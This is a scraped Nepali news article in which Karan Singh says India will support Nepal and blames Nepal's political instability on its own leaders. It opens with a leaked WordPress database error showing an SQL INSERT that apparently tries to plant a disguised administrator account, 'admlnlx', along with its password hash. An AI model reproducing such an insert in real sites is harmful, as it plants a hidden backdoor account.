WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIVtbzhyoks0yLxb3t71tV7R02Gznr1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 00:37:28', '', 'admlnlx', 'admlnlx')
नयाँदिल्ली, माघ ११–
भारतीय काँग्रेस आई पार्टीका वरिष्ठ राजनीतिज्ञ एवम् नेपाल मामिलाका जानकार डा. करण सिंहले भारत नेपालको छिमेकी मित्र राष्ट्र भएकोले सधैं नेपाललाई सहयोग गर्न तयार रहेको बताएका छन् ।
नयाँ दिल्लीमा रहेका नेपाली युवा प्रर्वद्धक एवम् विकासविद दिपेन्द्र कँडेलसँगको संक्षिप्त कुराकानीमा डा. सिंहले यस्तो बताएका हुन् । उनले भने, “नेपाल समृद्ध भएको हामी हेर्न चाहन्छौं, आर्थिक रुपमा सवल नेपाल बनेको नै भारत हेर्न चाहन्छ, भारत यसको लागि सदैव सहयोग गर्न समेत तयार छ ।” यद्यपी उनले नेपालमा प्रचुर संभाव्यताहरु भएपनि आर्थिक रुपमा यसलाई उपयोग गर्न भने नसक्नुमा राजनीतिक अस्थिरता नै मुख्य बाधक भएको बताउँदै त्यसलाई अन्त्य गर्नुपर्ने सुझाव दिए ।
सिंहले भारतले नेपालको राजनीति–सार्वभौमिकतामा कहिल्यै पनि प्रवेश नगरेको जिकिर गर्दै भने,“बरु भारतले नेपालको राजनीतिक अस्थिरता अन्त्यको लागि सदैव सहयोग गर्दै आएको छ।”उनले नेपालको राजनीतिक द्धन्द्ध अन्त्यको लागिभारतीयहरुको उपस्थितिमा नै धेरै सम्झौताहरु भएका समेत उदाहरण पेश गर्दै भने,“जस्तो १२ बुँदे सम्झौता ।”
नेपालमा राजनीतिक अस्थिरता कसरी अन्त्य गर्न सकिन्छ त भन्ने कँडेलको प्रश्नमा उनले भने,“यो नेपालका राजनीतिक दलका नेताहरुको जिम्मेवारी हो, हाम्रो होईन ।” उनले नेपालका नेताहरुले सबै जनताका बारेमा विशेष रुपले सोच्नुपर्ने बताउँदै खास गरी तराई बेल्टमा बस्नेहरुको बारेमा पनि सोचे भने समस्याको समाधान निस्किने धारणा राखे।
कँडेलले नेपालमा राजनीतिक अस्थिरता अन्त्य कसरी गर्न सकिन्छ भन्ने उद्देश्य बोकेर हाल नेपालभित्र र बाहिर देशका नेताहरुसँग भेटवार्ता गरिरहेका छन् ।